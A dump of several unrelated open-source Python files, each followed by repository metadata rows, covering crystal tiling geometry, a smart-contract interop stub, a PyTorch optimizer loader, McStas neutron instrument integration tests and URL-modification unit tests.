def Vy(self):
""" """
return self._TilingDirections[3]
class CubicTiling(Tiling):
""" """
DBL_TOL = 1e-5
# === STANDARD CONSTRUCTOR
def __init__(self, Parallelepiped_):
super().__init__()
self._TileShape = Parallelepiped_
self._TilingDirections = []
self._TilingDirections.append(-Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy - Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx)
self._TilingDirections.append(-Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx)
self._TilingDirections.append(Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy)
self._TilingDirections.append(Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx - Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(-Parallelepiped_.Vx + Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx - Parallelepiped_.Vy + Parallelepiped_.Vz)
self._TilingDirections.append(Parallelepiped_.Vx + Parallelepiped_.Vy + Parallelepiped_.Vz)
# === CONSTRUCTOR - From POSCAR file
@classmethod
def fromPOSCAR(cls, filename):
"""
Args:
filename:
Returns:
"""
return cls(Parallelepiped.fromPOSCAR(filename))
# === PROPERTY EVALUATION METHODS
def transformInsideTile(self, P, EdgeTol=DBL_TOL):
"""
Args:
P: param EdgeTol: (Default value = DBL_TOL)
EdgeTol: (Default value = DBL_TOL)
Returns:
"""
def _isInsideAndNotOnPosEdge(P, EdgeTol=EdgeTol):
return (self.TileShape.isInShape(P) and
self.TileShape.satisfiesFacet(P, 2, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 3, -EdgeTol) and
self.TileShape.satisfiesFacet(P, 4, -EdgeTol))
if _isInsideAndNotOnPosEdge(P):
return True # Do not transform P, return True
NegCorner = self.TileShape.V[0]
PosCorner = self.TileShape.V[7]
Nx = self.TileShape.FacetNorms[3]
Ny = self.TileShape.FacetNorms[2]
Nz = self.TileShape.FacetNorms[4]
while np.inner(P - NegCorner, -Nx) > CubicTiling.DBL_TOL:
P += self.TileShape.Vx
while np.inner(P - PosCorner, Nx) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vx
while np.inner(P - NegCorner, -Ny) > CubicTiling.DBL_TOL:
P += self.TileShape.Vy
while np.inner(P - PosCorner, Ny) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vy
while np.inner(P - NegCorner, -Nz) > CubicTiling.DBL_TOL:
P += self.TileShape.Vz
while np.inner(P - PosCorner, Nz) > -CubicTiling.DBL_TOL:
P -= self.TileShape.Vz
assert (_isInsideAndNotOnPosEdge(P))
return True
def getFractionalCoords(self, P, blnRelativeToCenter=False, blnRoundInside=True, blnPreferZero=True):
"""
Args:
P: param blnRelativeToCenter: (Default value = False)
blnRoundInside: Default value = True)
blnPreferZero: Default value = True)
blnRelativeToCenter: (Default value = False)
Returns:
"""
# NOTE: The option blnRoundInside is just a way to round numbers close
# to the bounds (0,1) so that they never result in values outside
# of that range. Some programs (like AtomEye?) are not robust
# enough to handle small negative numbers or values greater than 1
# in these cases.
Pfrac = self.TileShape.getFractionalCoords(P, blnRelativeToCenter=blnRelativeToCenter)
Pfrac -= Pfrac.astype(int)
if blnRoundInside:
if blnPreferZero:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
else:
Pfrac[np.isclose(Pfrac, 0.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 0.0
Pfrac[np.isclose(Pfrac, 1.0, rtol=0.0, atol=CubicTiling.DBL_TOL)] = 1.0
return Pfrac
def getDistance(self, P0, P1):
"""
Args:
P0: param P1:
P1:
Returns:
"""
result = np.linalg.norm(P1 - P0)
for TilingDirection in self.TilingDirections:
P1Tiled = P1 + TilingDirection
TiledDistance = np.linalg.norm(P1Tiled - P0)
if TiledDistance < result:
result = TiledDistance
return result
def replicateDesign(self, D, nTiles, OldToNewIndices=None, AuxPropMap=None):
"""Create a larger Design by tiling a smaller one.
Args:
D (Design): A smaller Design to tile.
nTiles (int/numpy.ndarray): A specifier for number of
tiles to replicate in periodic directions.
OldToNewIndices (dict<int,list<int>>): Optional, a
dictionary to store the mapping of tiled points
indices from the smaller Design to the larger.
(Default value = None)
AuxPropMap (dict<tuple<string,string>,dict<int,float>>):
Optional, a mapping of locations to properties.
NOTE: It is modified in place, so make a copy before.
(Default value = None)
Returns:
(Design): A larger, periodic Design
"""
if isinstance(nTiles, int):
nTiles = np.array([nTiles] * 3, dtype=int)
if OldToNewIndices is None and AuxPropMap is not None:
OldToNewIndices = {}
if OldToNewIndices is not None:
OldToNewIndices.clear()
for i in range(len(D)):
OldToNewIndices[i] = []
result = Design()
for nx in range(nTiles[0]):
for ny in range(nTiles[1]):
for nz in range(nTiles[2]):
Offset = nx * self.Vx + ny * self.Vy + nz * self.Vz
for i, P in enumerate(D.Canvas.Points):
j = len(result)
result.add(P + Offset, D.Contents[i])
if OldToNewIndices is not None:
OldToNewIndices[i].append(j)
if AuxPropMap is not None:
for AuxProp in AuxPropMap:
for i in OldToNewIndices:
for j in OldToNewIndices[i]:
AuxPropMap[AuxProp][j] = AuxPropMap[AuxProp][i]
return result
# === BASIC QUERY METHODS
@property
def TileShape(self):
""" """
return self._TileShape
@property
def TilingDirections(self):
""" """
return self._TilingDirections
@property
def Vx(self):
""" """
return self._TilingDirections[11]
@property
def Vy(self):
""" """
return self._TilingDirections[12]
@property
def Vz(self):
""" """
return self._TilingDirections[0]
| 37.453988 | 136 | 0.605569 | 1,897 | 18,315 | 5.746969 | 0.137586 | 0.089892 | 0.081086 | 0.124748 | 0.868281 | 0.85122 | 0.835535 | 0.82361 | 0.799395 | 0.795817 | 0 | 0.009204 | 0.294076 | 18,315 | 488 | 137 | 37.530738 | 0.834017 | 0.251979 | 0 | 0.717647 | 0 | 0 | 0.009628 | 0 | 0 | 0 | 0 | 0 | 0.015686 | 1 | 0.129412 | false | 0.003922 | 0.015686 | 0.023529 | 0.286275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7e1e9b15df1775872e3cfe1a89607aa8a7e6344e | 375 | py | Python | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 79 | 2017-10-22T03:35:06.000Z | 2021-12-02T10:28:06.000Z | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 122 | 2017-10-19T12:34:08.000Z | 2020-08-20T12:38:17.000Z | boa/interop/SmartContract.py | EdgeDLT/neo-boa | d238ffb4264ff62b35066159c7ead7115f3bf78c | [
"MIT"
] | 76 | 2017-10-19T05:09:55.000Z | 2020-12-08T12:03:59.000Z |
class SmartContract:
def Sha1(data):
"""
"""
pass
def Sha256(data):
"""
"""
pass
def Hash160(data):
"""
"""
pass
def Hash256(data):
"""
"""
pass
def VerifySignature(pubkey, signature):
"""
:param signature:
"""
pass
| 11.029412 | 43 | 0.365333 | 25 | 375 | 5.48 | 0.52 | 0.233577 | 0.321168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053763 | 0.504 | 375 | 33 | 44 | 11.363636 | 0.682796 | 0.045333 | 0 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0.454545 | 0 | 0 | 0.545455 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
7e4f030d71fae15cfa3baca6decb8a25b1ba8dfe | 5,314 | py | Python | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/pytorch/optimizers/return_optimizer.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | from monk.pytorch.optimizers.imports import *
from monk.system.imports import *
@accepts(dict, post_trace=False)
#@TraceFunction(trace_args=False, trace_rv=False)
def load_optimizer(system_dict):
'''
Load Optimizers in training states
Args:
system_dict (dict): System dictionary storing experiment state and set variables
Returns:
dict: updated system dict
'''
optimizer = system_dict["local"]["optimizer"];
learning_rate = system_dict["hyper-parameters"]["learning_rate"];
if(optimizer == "sgd"):
system_dict["local"]["optimizer"] = torch.optim.SGD(
system_dict["local"]["params_to_update"],
lr=learning_rate,
momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
dampening=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
nesterov=False);
elif(optimizer == "nesterov_sgd"):
system_dict["local"]["optimizer"] = torch.optim.SGD(
system_dict["local"]["params_to_update"],
lr=learning_rate,
momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
dampening=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum_dampening_rate"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
nesterov=False);
elif(optimizer == "rmsprop"):
system_dict["local"]["optimizer"] = torch.optim.RMSprop(
system_dict["local"]["params_to_update"],
lr=learning_rate,
alpha=system_dict["hyper-parameters"]["optimizer"]["params"]["decay_rate"],
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
momentum=0.0,
centered=False);
elif(optimizer == "momentum_rmsprop"):
system_dict["local"]["optimizer"] = torch.optim.RMSprop(
system_dict["local"]["params_to_update"],
lr=learning_rate,
alpha=system_dict["hyper-parameters"]["optimizer"]["params"]["decay_rate"],
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
momentum=system_dict["hyper-parameters"]["optimizer"]["params"]["momentum"],
centered=True);
elif(optimizer == "adam"):
system_dict["local"]["optimizer"] = torch.optim.Adam(
system_dict["local"]["params_to_update"],
lr=learning_rate,
betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
amsgrad=system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"]);
elif(optimizer == "adamax"):
system_dict["local"]["optimizer"] = torch.optim.Adamax(
system_dict["local"]["params_to_update"],
lr=learning_rate,
betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"]);
elif(optimizer == "adamw"):
system_dict["local"]["optimizer"] = torch.optim.AdamW(
system_dict["local"]["params_to_update"],
lr=learning_rate,
betas=(system_dict["hyper-parameters"]["optimizer"]["params"]["beta1"], system_dict["hyper-parameters"]["optimizer"]["params"]["beta2"]),
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
amsgrad=system_dict["hyper-parameters"]["optimizer"]["params"]["amsgrad"]);
elif(optimizer == "adadelta"):
system_dict["local"]["optimizer"] = torch.optim.Adadelta(
system_dict["local"]["params_to_update"],
lr=learning_rate,
rho=system_dict["hyper-parameters"]["optimizer"]["params"]["rho"],
eps=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"]);
elif(optimizer == "adagrad"):
system_dict["local"]["optimizer"] = torch.optim.Adagrad(
system_dict["local"]["params_to_update"],
lr=learning_rate,
lr_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["lr_decay"],
weight_decay=system_dict["hyper-parameters"]["optimizer"]["params"]["weight_decay"],
initial_accumulator_value=system_dict["hyper-parameters"]["optimizer"]["params"]["epsilon"]);
return system_dict; | 50.609524 | 151 | 0.625329 | 539 | 5,314 | 5.944341 | 0.12987 | 0.177903 | 0.159176 | 0.265293 | 0.825218 | 0.825218 | 0.759675 | 0.730961 | 0.71598 | 0.689139 | 0 | 0.001861 | 0.191005 | 5,314 | 105 | 152 | 50.609524 | 0.743429 | 0.040459 | 0 | 0.653846 | 0 | 0 | 0.345501 | 0.009077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.025641 | 0 | 0.051282 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7e6c468f3bbb4807c439e41136e12ce330382a7d | 128 | py | Python | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | null | null | null | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | 1 | 2019-03-15T14:45:46.000Z | 2019-03-15T14:45:46.000Z | mail_multi_website/tests/__init__.py | brain-tec/mail-addons | 92efb62ad5c4d9843654ae3e49b120a8759ff2bf | [
"MIT"
] | 1 | 2021-08-28T11:18:33.000Z | 2021-08-28T11:18:33.000Z | # License MIT (https://opensource.org/licenses/MIT).
from . import test_send
from . import test_render
from . import test_fetch
| 25.6 | 52 | 0.773438 | 19 | 128 | 5.052632 | 0.631579 | 0.3125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 128 | 4 | 53 | 32 | 0.857143 | 0.390625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7e95711252e29be08a362b82e1fc03e9ef3f0085 | 1,506 | py | Python | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 85 | 2017-11-21T12:22:02.000Z | 2022-03-27T23:07:17.000Z | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 545 | 2017-11-04T14:15:04.000Z | 2022-03-27T14:19:27.000Z | src/the_tale/the_tale/common/utils/tests/test_urls.py | al-arz/the-tale | 542770257eb6ebd56a5ac44ea1ef93ff4ab19eb5 | [
"BSD-3-Clause"
] | 45 | 2017-11-11T12:36:30.000Z | 2022-02-25T06:10:44.000Z |
import smart_imports
smart_imports.all()
class UrlsTests(utils_testcase.TestCase):
def setUp(self):
super(UrlsTests, self).setUp()
def test_modify_url__no_query(self):
self.assertEqual(utils_urls.modify_url('www.example.com', query=()), 'www.example.com')
self.assertEqual(utils_urls.modify_url('http://www.example.com/', query=()), 'http://www.example.com/')
self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z', query=()), 'http://www.example.com/?x=y&x=z')
self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z#abc=p&p=abc', query=()), 'http://www.example.com/?x=y&x=z#abc=p&p=abc')
def test_modify_url(self):
query = ( ('x', 123), ('test', 'bla-bla'), ('test', 'ма-ма') )
self.assertEqual(utils_urls.modify_url('www.example.com', query=query), 'www.example.com?x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
self.assertEqual(utils_urls.modify_url('http://www.example.com/', query=query), 'http://www.example.com/?x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z', query=query), 'http://www.example.com/?x=y&x=z&x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0')
self.assertEqual(utils_urls.modify_url('http://www.example.com/?x=y&x=z#abc=p&p=abc', query=query),
'http://www.example.com/?x=y&x=z&x=123&test=bla-bla&test=%D0%BC%D0%B0-%D0%BC%D0%B0#abc=p&p=abc')
| 60.24 | 180 | 0.652722 | 263 | 1,506 | 3.638783 | 0.129278 | 0.167189 | 0.217346 | 0.213166 | 0.825496 | 0.816092 | 0.797283 | 0.787879 | 0.787879 | 0.765935 | 0 | 0.029213 | 0.113546 | 1,506 | 24 | 181 | 62.75 | 0.68764 | 0 | 0 | 0 | 0 | 0.411765 | 0.444518 | 0.043189 | 0 | 0 | 0 | 0 | 0.470588 | 1 | 0.176471 | false | 0 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0e2ea3bc8e861e1df93948290edaaf2c87c368e2 | 179 | py | Python | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | 23 | 2019-02-17T17:49:28.000Z | 2021-12-02T01:20:58.000Z | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | null | null | null | trickster/utility/__init__.py | tahesse/trickster | d22072bebbebff319c724806d583bfa982d429be | [
"MIT"
] | 4 | 2019-02-17T16:39:46.000Z | 2021-12-02T01:21:36.000Z | from . import artifactory
from . import history
from . import model_utils
from . import numeric_utils
from . import tensor_utils
from . import training_utils
from . import visual
| 22.375 | 28 | 0.804469 | 25 | 179 | 5.6 | 0.4 | 0.5 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156425 | 179 | 7 | 29 | 25.571429 | 0.927152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0e99a42157e758091a8bc259b3fc1a67d63f7833 | 7,853 | py | Python | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 3 | 2019-08-29T14:15:06.000Z | 2021-03-04T12:08:48.000Z | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 37 | 2019-03-05T12:28:32.000Z | 2022-03-22T10:11:23.000Z | mcstasscript/integration_tests/test_simple_instrument.py | PaNOSC-ViNYL/McStasScript | bd94ebc6cac290c3c9662871df40d76edbe4a44e | [
"BSD-3-Clause"
] | 6 | 2019-10-21T20:19:10.000Z | 2022-03-09T10:12:16.000Z | import io
import os
import unittest.mock
from mcstasscript.interface import instr
def setup_simple_instrument():
Instr = instr.McStas_instr("integration_test_simple")
source = Instr.add_component("source", "Source_div")
source.xwidth = 0.03
source.yheight = 0.01
source.focus_aw = 0.01
source.focus_ah = 0.01
source.E0 = 81.81
source.dE = 1.0
source.flux = 1E10
PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
PSD.set_AT([0, 0, 1], RELATIVE="source")
PSD.xwidth = 0.1
PSD.nx = 100
PSD.yheight = 0.03
PSD.filename = "\"PSD.dat\""
PSD.restore_neutron = 1
return Instr
def setup_simple_instrument_input_path():
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
input_path = os.path.join(THIS_DIR, "test_input_folder")
Instr = instr.McStas_instr("integration_test_simple_input",
input_path=input_path)
source = Instr.add_component("source", "Source_div")
source.xwidth = 0.03
source.yheight = 0.01
source.focus_aw = 0.01
source.focus_ah = 0.01
source.E0 = 81.81
source.dE = 1.0
source.flux = 1E10
PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
PSD.set_AT([0, 0, 1], RELATIVE="source")
PSD.xwidth = 0.1
PSD.nx = 100
PSD.yheight = 0.03
PSD.filename = "\"PSD.dat\""
PSD.restore_neutron = 1
return Instr
def setup_simple_slit_instrument():
Instr = instr.McStas_instr("integration_test_simple")
source = Instr.add_component("source", "Source_div")
source.xwidth = 0.1
source.yheight = 0.01
source.focus_aw = 0.01
source.focus_ah = 0.01
source.E0 = 81.81
source.dE = 1.0
source.flux = 1E10
Instr.add_parameter("slit_offset", value=0)
Slit = Instr.add_component("slit", "Slit")
Slit.set_AT(["slit_offset", 0, 0.5], RELATIVE="source")
Slit.xwidth = 0.01
Slit.yheight = 0.03
PSD = Instr.add_component("PSD_1D", "PSDlin_monitor")
PSD.set_AT([0, 0, 1], RELATIVE="source")
PSD.xwidth = 0.1
PSD.nx = 100
PSD.yheight = 0.03
PSD.filename = "\"PSD.dat\""
PSD.restore_neutron = 1
return Instr
class TestSimpleInstrument(unittest.TestCase):
"""
Integration test of a full instrument with McStas simulation
performed by the system. The configuration file needs to be set up
correctly in order for these tests to succeed.
"""
@unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
def test_simple_instrument(self, mock_stdout):
"""
Test that an instrument can run and that the results match
expectations. Here beam in small area in the middle of the
detector.
"""
CURRENT_DIR = os.getcwd()
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
Instr = setup_simple_instrument()
data = Instr.run_full_instrument(foldername="integration_test_simple",
ncount=1E6, mpi=1,
increment_folder_name=True)
os.chdir(CURRENT_DIR)
intensity_data = data[0].Intensity
# beam should be on pixel 35 to 65
sum_outside_beam = (sum(intensity_data[0:34])
+ sum(intensity_data[66:99]))
sum_inside_beam = sum(intensity_data[35:65])
self.assertTrue(1000*sum_outside_beam < sum_inside_beam)
@unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
def test_simple_instrument_input(self, mock_stdout):
"""
Test that an instrument can run and that the results match
expectations. Here beam in small area in the middle of the
detector.
"""
CURRENT_DIR = os.getcwd()
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
Instr = setup_simple_instrument_input_path()
foldername = "integration_test_simple_input"
data = Instr.run_full_instrument(foldername=foldername,
ncount=1E6, mpi=1,
increment_folder_name=True)
os.chdir(CURRENT_DIR)
intensity_data = data[0].Intensity
# beam should be on pixel 35 to 65
sum_outside_beam = (sum(intensity_data[0:34])
+ sum(intensity_data[66:99]))
sum_inside_beam = sum(intensity_data[35:65])
self.assertTrue(1000*sum_outside_beam < sum_inside_beam)
# Check component from input_folder read
self.assertEqual(data[0].metadata.xlabel, "Test")
@unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
def test_simple_instrument_mpi(self, mock_stdout):
"""
Test that an instrument can run and that the results matches
expectations. Here beam in small area in the middle of the
detector. Running with mpi, 2 cores.
"""
CURRENT_DIR = os.getcwd()
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
Instr = setup_simple_instrument()
data = Instr.run_full_instrument(foldername="integration_test_mpi",
ncount=1E6, mpi=2,
increment_folder_name=True)
os.chdir(CURRENT_DIR)
intensity_data = data[0].Intensity
# beam should be on pixel 35 to 65
sum_outside_beam = (sum(intensity_data[0:34])
+ sum(intensity_data[66:99]))
sum_inside_beam = sum(intensity_data[35:65])
self.assertTrue(1000*sum_outside_beam < sum_inside_beam)
@unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
def test_slit_instrument(self, mock_stdout):
"""
Test parameters can be controlled through McStasScript. Here
a slit can be moved, but the default value of 0 should be
used.
"""
CURRENT_DIR = os.getcwd()
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
Instr = setup_simple_slit_instrument()
foldername = "integration_test_slit"
data = Instr.run_full_instrument(foldername=foldername,
ncount=2E6, mpi=2,
increment_folder_name=True)
os.chdir(CURRENT_DIR)
intensity_data = data[0].Intensity
# beam should be on pixel 45 to 55
sum_outside_beam = (sum(intensity_data[0:44])
+ sum(intensity_data[56:99]))
sum_inside_beam = sum(intensity_data[45:55])
self.assertTrue(1000*sum_outside_beam < sum_inside_beam)
@unittest.mock.patch("sys.stdout", new_callable=io.StringIO)
def test_slit_moved_instrument(self, mock_stdout):
"""
Test parameters can be controlled through McStasScript. Here
a slit is moved to one side and the result is verified.
"""
CURRENT_DIR = os.getcwd()
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
Instr = setup_simple_slit_instrument()
data = Instr.run_full_instrument(foldername="integration_test_slit",
ncount=2E6, mpi=2,
increment_folder_name=True,
parameters={"slit_offset": 0.03})
os.chdir(CURRENT_DIR)
intensity_data = data[0].Intensity
# beam should be on pixel 75 to 85
sum_outside_beam = (sum(intensity_data[0:74])
+ sum(intensity_data[86:99]))
sum_inside_beam = sum(intensity_data[75:85])
self.assertTrue(1000*sum_outside_beam < sum_inside_beam)
if __name__ == '__main__':
unittest.main()
| 31.922764 | 78 | 0.615179 | 1,011 | 7,853 | 4.541048 | 0.162216 | 0.056633 | 0.052276 | 0.037029 | 0.826835 | 0.80941 | 0.80941 | 0.773252 | 0.743411 | 0.714441 | 0 | 0.041942 | 0.286515 | 7,853 | 245 | 79 | 32.053061 | 0.777441 | 0.131924 | 0 | 0.72973 | 0 | 0 | 0.067263 | 0.025602 | 0 | 0 | 0 | 0 | 0.040541 | 1 | 0.054054 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bc1222c88e1cfab97e44da926e07eed4330369b4 | 284 | py | Python | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | 2 | 2021-11-30T18:44:11.000Z | 2021-11-30T18:44:19.000Z | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | explicalib/calibration/evaluation/plots/binary/__init__.py | euranova/estimating_eces | 9bfa81dd7a39ebe069c5b11b8e7a9bf9017e9350 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author: nicolas.posocco
"""
from .binary_reliability import plot_binary_reliability_diagram
